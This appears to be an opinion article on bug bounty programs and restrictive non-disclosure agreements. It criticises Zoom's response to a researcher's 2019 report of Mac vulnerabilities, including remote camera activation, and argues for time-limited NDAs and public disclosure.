Despite an organization’s best efforts to produce a service that runs flawlessly and is secure, software bugs can and do occur, and some are more serious than others.
Sometimes these bugs can go undetected even by the most experienced security teams, potentially resulting in a product that compromises its users’ digital security and leaves them exposed to cyberattacks. Many companies set up bug bounty programs to enlist cybersecurity researchers to help them locate vulnerabilities that may lurk undetected in their systems.
Essentially, the researcher hacks (ethically) into the vendor’s system to try to exploit any vulnerabilities that may exist. If the researcher discovers a vulnerability that poses a significant enough risk, the researcher can collect a bug bounty worth hundreds of dollars, or even hundreds of thousands of dollars, depending on the severity of the bug discovered. Bug bounty hunters often act as the unsung heroes of cybersecurity keeping organizations accountable for ensuring the digital security of consumers.
What happens, though, when an organization is in disagreement with the cybersecurity researcher over the severity of a vulnerability uncovered by the researcher? What happens when an organization attempts to avoid accountability by prohibiting the researcher from publicly disclosing his or her findings, or only agrees to pay a bug bounty on the condition that the researcher remains publicly silent about a vulnerability? When this happens, consumers’ digital security and personal privacy can be seriously jeopardized.
Bug bounty programs are essential to keeping the systems that run the software and applications consumers use every day secure and working properly. They incentivize cybersecurity researchers and ethical hackers to come forward and find vulnerabilities. It stands to reason that requiring bug bounty hunters to sign a non-disclosure agreement (NDA) is also an important and effective way to prevent any potentially serious vulnerabilities from being exposed publicly and exploited before they are patched.
That said, NDA provisions that prevent a researcher from ever publicly disclosing a vulnerability could, for example, provide little incentive for a company to properly address the fault, leaving users exposed to various cyberthreats.
Security researchers and bug bounty hunters do a great job of holding companies accountable for keeping their users safe and secure. But when companies engage in questionable NDA tactics with security researchers to skirt that accountability, user security can be put at substantial risk.
In light of the recent wave of high-profile data breaches and major security oversights involving some of the biggest names in tech, the public deserves much greater accountability from the companies they entrust with their information. Lawmakers across the globe have started cracking down on the industry and have been drafting legislation that aims to protect consumers while holding tech companies accountable for how they handle sensitive data. Top industry executives like Facebook’s Mark Zuckerberg, Microsoft’s Bill Gates, and Apple’s Tim Cook have all acknowledged the need for better consumer privacy protections as well as a greater sense of accountability for companies. At the same time, consumers have become increasingly distrustful of how companies manage their private data.
Considering this trend, Zoom’s handling of a cybersecurity researcher’s responsible disclosure of several serious vulnerabilities in its video-conferencing application is baffling. In March, cybersecurity researcher Jonathan Leitschuh contacted Zoom to notify the company of three major security vulnerabilities existing within its video-conferencing application for Mac computers. In addition to a bug that allowed a malicious attacker to launch a denial of service (DOS) attack on a user’s machine, and a bug that left a local web server installed on the user’s Mac even after uninstalling the Zoom application, Leitschuh also uncovered a gravely alarming vulnerability that allowed for a malicious third-party entity to remotely and automatically enable an unsuspecting Mac user’s microphone and camera.
According to Leitschuh's blog post Zoom continuously downplayed the severity of the vulnerabilities during ongoing talks. Leitschuh gave Zoom an industry-standard 90-day window in which to resolve the issues before proceeding with public disclosure. He even provided Zoom with what he called a “quick fix” solution to temporarily patch the camera vulnerability while the company finished work on rolling out the permanent fix. During a meeting prior to the 90-day public disclosure deadline, Zoom presented Leitschuh with its proposed fix. However, the researcher was quick to point out that the proposed solution was inadequate and could easily be bypassed through various means.
At the end of the 90-day public disclosure deadline, Zoom implemented the temporary “quick fix” solution. Leitschuh wrote in his blog post:
"Ultimately, Zoom failed at quickly confirming that the reported vulnerability actually existed and they failed at having a fix to the issue delivered to customers in a timely manner. An organization of this profile and with such a large user base should have been more proactive in protecting their users from attack."
In its initial response to the public disclosure on the company blog, Zoom refused to acknowledge the severity of the video vulnerability and “ultimately...decided not to change the application functionality.” Although (only after receiving significant public backlash following the disclosure) Zoom did agree to completely remove the local web server that made the exploit possible, the company’s initial response along with Leitschuh’s accounts of how Zoom chose to address his responsible disclosure reveals that Zoom did not take the issue seriously, and had little interest in properly resolving it.
Keep Quiet
Zoom had attempted to buy Leitschuh’s silence on the issue by allowing him to benefit from the company’s bug bounty program only on the condition that he signed an excessively strict NDA. Leitschuh declined the offer. Zoom contended that the researcher was offered a financial bounty but declined it because of “non-disclosure terms”. What Zoom neglected to mention is that the specific terms meant Leitschuh would have been prohibited from disclosing the vulnerabilities even after they were properly patched. This would have given Zoom zero incentive to patch a vulnerability the company dismissed as being insignificant.
NDAs are common practice in bug bounty programs, but demanding permanent silence from the researcher is akin to paying hush money and ultimately doesn’t benefit the researcher, nor does it benefit users, or the public in general. The role of the NDA should be to give the company a reasonable amount of time to address and fix a vulnerability before it is exposed to the public and potentially exploited by cybercriminals. Companies have a reasonable expectation of non-disclosure while working to fix a vulnerability, but primarily for the benefit of the user, not primarily to save face in the court of public opinion. Researchers, on the other hand, have a reasonable expectation for a monetary reward, as well as for public recognition for their efforts. Users have a reasonable expectation that the companies whose products they use are doing everything they can to secure their privacy. Finally, the public has a reasonable right to know what security vulnerabilities exist and what is being done to protect consumers from cyber threats, and what consumers can do to protect themselves.
Conflicting Priorities
It would have been difficult for Zoom to handle this situation worse than it did. The company was so focused on creating a seamless user experience that it completely lost sight of the critical importance of protecting user privacy. “Video is central to the Zoom experience. Our video-first platform is a key benefit to our users around the world, and our customers have told us that they choose Zoom for our frictionless video communications experience,” the company stated in its response. But Zoom resorted to installing a local web server in the background on Mac computers that effectively bypassed a security feature in the Safari web browser to facilitate this “frictionless” video experience for its users. The Safari security feature in question required user confirmation prior to launching the app on a Mac. Zoom’s solution to this was to bypass it deliberately and put its users’ privacy at risk to save them a click or two.
Only after the public backlash it received in the wake of the disclosure did the company take meaningful action. The company’s initial response suggested that it had no intention of changing the application functionality even in light of the significant vulnerabilities the application harbored. It seems that the company was willing to prioritize user experience over user security. While smooth user experience is undoubtedly beneficial for any online application, it certainly shouldn’t come at the expense of security and privacy.
To the company’s credit, co-founder and CEO Eric S. Yuan later acknowledged that Zoom handled the situation poorly and committed to doing better going forward. Yuan stated in a blog post that “we misjudged the situation and did not respond quickly enough — and that’s on us. We take full ownership and we’ve learned a great deal. What I can tell you is that we take user security incredibly seriously and we are wholeheartedly committed to doing right by our users,” adding also that “our current escalation process clearly wasn’t good enough in this instance. We have taken steps to improve our process for receiving, escalating, and closing the loop on all future security-related concerns.”
"we misjudged the situation and did not respond quickly enough — and that’s on us.
Ultimately though, the reality remains that had the researcher agreed to the terms of the NDA presented to him by Zoom and had been prohibited from disclosing his findings, we could have very likely never heard anything about the vulnerability. Worse yet, the company could have likely never fixed the issue, leaving millions of users vulnerable to a serious invasion of privacy.